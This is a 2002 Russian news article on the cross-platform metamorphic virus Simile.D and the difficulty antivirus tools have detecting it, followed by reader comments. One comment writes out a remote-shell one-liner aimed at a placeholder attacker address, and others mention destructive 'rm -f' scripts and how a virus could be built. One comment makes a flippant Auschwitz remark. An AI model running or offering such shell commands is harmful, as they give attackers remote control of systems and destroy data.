Все новости от 5 июня 2002 г.

Новый вирус жалит, не разбирая платформ

Программа ухитряется не только скрывать присутствие вируса, но и произвольно менять свой размер, что еще больше затрудняет его идентификацию. Помимо того, последний, четвертый вариант кода, появившийся на этой неделе, способен заражать как Windows-, так и Linux-компьютеры. «Это усиливает угрозу появления кроссплатформных вирусов», — говорит директор по экстренной помощи антивирусной компании Symantec Винсент Уифер (Vincent Weafer).

Этот вирус служит наглядным цифровым доказательством того, что кучка программистов-озорников способна создать код, с трудом обнаруживаемый современным антивирусным ПО. Антивирусным компаниям придется туго, если таких сложных вирусов станет больше. Чтобы бороться с ними, защитное ПО должно опробовать разные способы идентификации вирусов, добиваясь максимального уровня обнаружения. И хотя защита у пользователей ПК, наверное, все же будет, большинство компьютеров окажется перегруженными этой работой. Если же пытаться сохранить производительность систем, то она окажется беззащитной от скрытых вирусов.

«Это заставляет нас задуматься о других методах решения проблем, — говорит сотрудник McAfee, антивирусного подразделения Network Associates, Джимми Куо (Jimmy Kuo). — Больше всего нас тревожит то, что для эффективного обнаружения требуется слишком много времени. Когда вирусы становятся такими сложными, что для их обнаружения требуется вечность, нужно что-то менять».

Эта угроза гораздо серьезнее, чем сам Simile.D. Выпущенный в интернет, вирус может создать администраторам проблемы своей способностью перескакивать с платформы Windows на платформу Linux и обратно. Сам же вирус не так уж и страшен. На Windows-системах он дважды в год, 17 марта и 17 сентября, открывает окно диалога с именем автора и названием вируса. На Linux-компьютерах Simile.D проделывает то же самое 17 марта и 17 мая.

Это не первая попытка создания вируса, заражающего и Windows, и Linux. Год назад появился вирус под названием Winux, или Lindose, но распространения он не получил. Simile.D успешно распространяется на Linux-машинах, но риск ослабляется тем фактом, что по-настоящему могут быть заражены только системы, работающие в так называемом суперпользовательском режиме доступа к системе. «В Linux-системах он менее эффективен, особенно если работать в режиме пользователя, — говорит Уифер из Symantec. — Заражение Windows-системы от Linux-системы более вероятно, чем наоборот».

Роджер Томпсон (Roger Thompson), технический директор компании TruSecure по исследованию злоумышленного кода, не считает, что из-за вируса Simile.D, несмотря на его универсальность, стоит особо беспокоиться. «По-настоящему широко распространяются такие черви, как Code Red и Nimda, в которых применяется какой-то новый эксплойт», — утверждает он.

Вирус Nimda, эпидемия которого разразилась в сентябре прошлого года, сочетал атаки нескольких разных типов, распространяясь по e-mail, через JavaScript, сетевые диски общего пользования и уязвимые веб-серверы. Ему удалось пробить бреши в защите многих компаний, несмотря на наличие у них антивирусного ПО. Как и Simile.D, червь Nimda продемонстрировал антивирусным компаниям, что гонка вооружений между вирусописцами и вирусологами весьма далека от завершения.

Simile.D, который еще называют Etap.D, — пример «концепт-вируса», образец, созданный в подпольной лаборатории и выставленный на всеобщее обозрение. Крупные антивирусные компании уже включили в свои продукты средства его обнаружения, так что для большинства пользователей интернета, регулярно загружающих последние обновления, он не опасен.

И все же найти противоядие для Simile.D нелегко. Многие антивирусные программы основаны на цифровых «отпечатках пальцев» кода. Например, этим методом легко обнаружить Klez.h, последний вариант червя Klez. Но способность Simile.D хамелеоном менять собственные характеристики усложняет дело. На этот случай во многих программах предусмотрены детектор вирусоподобного поведения и механизм перебора разных способов сличения с образцом, которые позволяют расшифровывать программы, маскирующие вирусы или цепляющие их к другим программам. «Лишь сочетая все перечисленное выше, вы получаете удовольствие наблюдать сам код», — говорит Уифер из Symantec.

Однако эти методы очень ресурсоемки, что заставляет программистов искать другие способы защиты систем: «заверение» кода цифровой подписью из достоверного источника; ведение базы данных приемлемых для системы кодов; ограничение прав пользователей решением тех задач, которые не пропускают вирусные атаки.

«Хотя Simile.D и оживил дискуссию между специалистами по антивирусам о том, каким способом лучше всего защищать системы в будущем, стандартные меры остаются действенными, — отмечает Куо из Network Associates. — Речь идет лишь о перспективе». 

 Предыдущие публикации:

 В продолжение темы:

Обсуждение и комментарии

	me - userinternet.com 5 Jun 2002 11:26 PM
Типа, дождались:)) Кто там пел о принципиальной невозможности существования вирусов в ELF файликах?:)))
	Qrot 5 Jun 2002 11:31 PM
да, мы в предвкушении :))
	Skull - sibskullmail.ru 6 Jun 2002 6:25 AM
2me: про теоретическую возможность распространения через ELF PTO уже сказал. И юниксоиды с этим с кучей оговорок согласились. Речь идет о другом - _КАК_ этот вирус будет активирован. Причем в очень гетерогенной структуре дистрибутивов? Мылеры не открывают файлов на исполнение. Пожалуй, только архив с сохранением аттрибутов. Но архиваторы типа ark тоже этого не делают. Остаются только дыры. Но в связи с постоянным выходом халявных дистров ПО часто обновляется. Резюмируя: есть возможность заражения через дыры. Трюки с запуском по расширению, как в OE не проходят. Поэтому можно спать спокойно.
	eXOR - billgmicrosoft.com 6 Jun 2002 7:31 AM
2 me: Всегда было имхо очевидно что существовать они там могли, только вот эффективность какая - ы? :-) Да и кстати... если верить статье то в антивирусных конторах сидят полные пробитые лохи... вирус - то не очень и прячется... уловки все чуть ли не стандартные. Гыы... а то что написали заражалку для двух платформ - показатель того, что у автора вируса очень плоская жопа... ибо задача совсем не интересная, зато очень и очень нудная.
	me - userinternet.com 6 Jun 2002 10:29 AM
>> Всегда было имхо очевидно что существовать они там могли Для меня это тоже очевидно:)) Но вот для некоторых очень умных перцев, появляющихся иногда на местных форумах - нет.
	Qrot 6 Jun 2002 10:35 AM
2eXOR: да нет там ничего нудного! что мешает на самом деле написать минимальную либу, работающую и с линуксовым ядром и с нт-евым (минуя либси)? а ничего не мешает, надо заметить.. так что у парня не плоская жопа, а голова светлая раз одинаково легко понимает работу линуха и нт... а такой вопрос - антивирусы под линукс есть? :) хоть бы аидстест какой завалящий :))
	Qrot 6 Jun 2002 10:39 AM
2eXOR: первые вирусы под дос и винду цвели самым махровым цветом на ВЦ институтов и университетов.. первокурсники вобщем не самые продвинутые юзера :)) правда, иногда вирусы там же и создавались... так что если где в универе стоят x86 с линухом и с общим доступом - считай, попали :)
	Наблюдатель 6 Jun 2002 11:02 AM
2Qrot DrWeb под linux есть, по-моему.
	Проходивший мимо 6 Jun 2002 11:04 AM
2Qrot: > что мешает на самом деле написать минимальную либу, > работающую и с линуксовым ядром и с нт-евым (минуя либси) то, что она по размерам будет не на много меньше самой glibc и самих виндовых библиотек. Тогда уж проще взять исходники glibc и повыкидать неиспользуемые в вирусе куски кода. Или линковать его как static (а это опять же увеличит размеры вируса...) - что кстати избавит вирус от зависимости от версии glibc, установленой на атакуемой системе. Или ещё его можно собирать на атакованой машине - как в вирусе by R.T.Morris (вспомним 1986 год). Система атаковалась небольшим модулем, после проникновения в систему тело червя линковалось на зараженной машине - т.е. вирус таскал с собой свои объектные модули). С виндой всё усложняется отсутствием исходников виндовых библиотек и закрытостью системы (только не надо тут вспоминать про MSDN - покажите мне документацию по kernel features, etc). > а такой вопрос - антивирусы под линукс есть Дык! Давно уже. И с успехом используются для фильтрации входящей почты (подробности см. на сайтах производителей антивирусов). 2ALL: Вирус при желании можно написать под что угодно - в своё время из любопытства их писали под RSX-11M, только это не значило, что тут же началась эпидемия - там нормальная система разделения прав - so...
	SlvUn - slvunmail.ru 6 Jun 2002 11:16 AM
М-да, вирусы под Линукс конечно будут, по простой причине - их намного легче писать. :)) Сейчас я объясню почему. Что в *nix'ах можно сделать через шелл надеюсь все знают, для тех кто не знает - правильый ответ все что угодно :)). Убежден на 100% что основную опасность будут представлять из себя не гиперумные программы способные работать с динамической и статической линковкой бинарников, и не всякие резиденты скрывающие свое присутствие и изменяющие свой размер, и не вирусы перехватывающие вызовы glibc, и не etc. Самыми страшными вирусами будут обычные тупые шелловские скрипты, содержащие а-ля rm -f Как же они будут распространяться? Да очень просто, большинство юзеров будут преспокойно скачивать такие файлы, или сохранять вложения и не глядя их запускать. А работать они будут есс-но из под рута. Тут им и абздец. Вот такое немного печальное видение будущего. Единственная надежда - что люди научаться заводить себе юзверей без администраторских прав, но в это я не верю.
	Qrot 6 Jun 2002 11:18 AM
2Проходивший мимо: два слова только скажи про эти антивирусы - они только почту фильтруют? а память проверяют, а винт сканируют? если вирус полиморфный, сигнатура у него постоянно меняться будет, АФАИК, так что аттачмент может и пройти.. ИМХО, такая либа по размерам будет значительно меньше глибси - нужны только файловые операции, как я понимаю, и то немного.. сделать все очень тупо и просто - и здравствуй, вот и я :) отсутствие исходников под винды на самом деле мало что усложняет - есть SoftICE, есть куча книжек типа Native NT или Undocumented NT.. если человек профи (а автор судя по всему профи) то сложностей особых нет... мои соболезнования на самом деле... и поздравления - момент можно сказать исторический! :)
	Проходивший мимо 6 Jun 2002 12:06 PM
2Qrot: >два слова только скажи про эти антивирусы - они только почту фильтруют? Не только - они делают то же что и обычные виндовые. Просто я лично прикручивал их к sewndmail-у (один раз это был drweb, второй раз - avp). Для остального они мне были бесполезны (оба раза была разовая работенка - поставить smtp/pop3/imap/proxy/firewall на одной машине для мелких контор). Уже больше года работают на полном автопилоте - антивирусные базы обновляют по cron-у ч-з i-net. > такая либа по размерам будет значительно меньше > глибси - нужны только файловые операции всё зависит насколько развесистый будет вирус - если будет например атаковать удаленные системы ч-з i-net - то сразу потянутся функции работы с ip стеком, библиотеки nss, им в свою очередь понадобятся функци работы с памятью, и.т.д - по цепочке. В результате выйдет не так уж и мало. А если это будет простенький файловый вирус типа dos-овских - то стоит ли из-за этого огород городить ?...А вообще SlvUn прав - самый универсальный код - это написаный на скриптовых языках. Сейчас на большей части unix like систем есть например perl... Ну что - напишем всей тусовкой вирус, который бы таскал с собой perl и нужные модули бы подгружал с cpan.org ? ;) PS: Последний абзац - это шутка, для тех кто не понял.
	Qrot 6 Jun 2002 12:33 PM
2Проходивший мимо: спасибо что рассказал, а то я по простоте душевной все думал что на линуксах никто и не чешется по этому поводу. в каждой шутки есть доля шутки... как я понимаю, что бы выполнить строку типа csh < telnet <atacker_addr> <port> много ума не надо...
	eXOR - billgmicrosoft.com 6 Jun 2002 12:34 PM
2 Qrot: Дыкть а что - там понимать то в работе WinNT/Linux? Для инфицирования ELF, так же как и PE требуется только прочтенние 2 страничной доки с форматом файла... Профи - тот кто придумывает что - то новое в вирусописании... хитрый алгоритмик для прятанья себя от антивирей, умный механизм траханья железа... итд... а это имхо - просто плоскожопие... слепил поддержку 2-х форматов и готово... Поддержка MZ и PE давно уже сделана была... это считай то же самое.
	Qrot 6 Jun 2002 12:40 PM
2eXOR: я не про форматы говорил, а про работу непосредственно с ядром
	Skull - sibskullmail.ru 7 Jun 2002 5:45 AM
2SlvUn: "преспокойно скачивать такие файлы, или сохранять вложения и не глядя их запускать" - не забывайте, что нужно еще и +x сделать. :) Запуск по расширению с выполнением под Unix очень усложнен.
	Skull - sibskullmail.ru 7 Jun 2002 5:48 AM
2Qrot: ну что же Вы так! Хоть бы потрудились почитать на сайтах AVP, DrWEB, antivirus.com - эти антивирусы _всё_ мониторят и лечат. Просто большинство админов их на почту ставят.
	####### 7 Jun 2002 10:03 AM
Такие все "крутые" спецы (бываю часто на форуме), а не знают элементарного про те же антивирусы. Странно... А сами их что, вообще не используете? Теперь понятно, что если такие "профи" админы, то почему мнее пришло 39 инфицированных Клезом рассылок за ночь.
	####### 7 Jun 2002 10:03 AM
Такие все "крутые" спецы (бываю часто на форуме), а не знают элементарного про те же антивирусы. Странно... А сами их что, вообще не используете? Теперь понятно, что если такие "профи" админы, то почему мнее пришло 39 инфицированных Клезом рассылок за ночь.
	eXOR - billgmicrosoft.com 7 Jun 2002 10:33 AM
2 ###: Дыкть... господин должен понимать что админы не боги... и от тупого узверя есть только одно лекарство - гранатомет. (тупой имеется ввиду тот, кому 5 раз сказали что так делать нельзя, а он(а) все - равно продолжает).
	Bosch - boschpisem.net 7 Jun 2002 10:49 AM
2 eXOR Easy, easy! А от тупых админов, которые считают, что компы и сеть для того существуют, чтобы их раз отадминистрить, запретить всем все, настроить, залить эпоксидкой и флеймить на ЗиДиНет-е, также есть одно средство - Auschwitz. Поэтому... "Граждане пассажиры, будьте взаимно вежливы!".
	EROS - boooohotbox.ru 7 Jun 2002 6:06 PM
EROS спасет отца русской демократии.
	eXOR - billgmicrosoft.com 10 Jun 2002 11:02 AM
2 Bosch: Ты не правильно понял. Я специально в скобочках пояснил что такое тупой юзверь... Это такой узверь, который считает что его святая задача _ВСЮ_ работу с компьютером переложить на плечи админа. Т.е. тот кто считает что работая с компом он не должен знать как тот включается, как вставляется дискета. Т.е. тот, кто не умеет и не хочет пользоваться _СВОИМ_РАБОЧИМ_ИНСТРУМЕНТОМ_. А по - поводу вежливости.... согласен :-).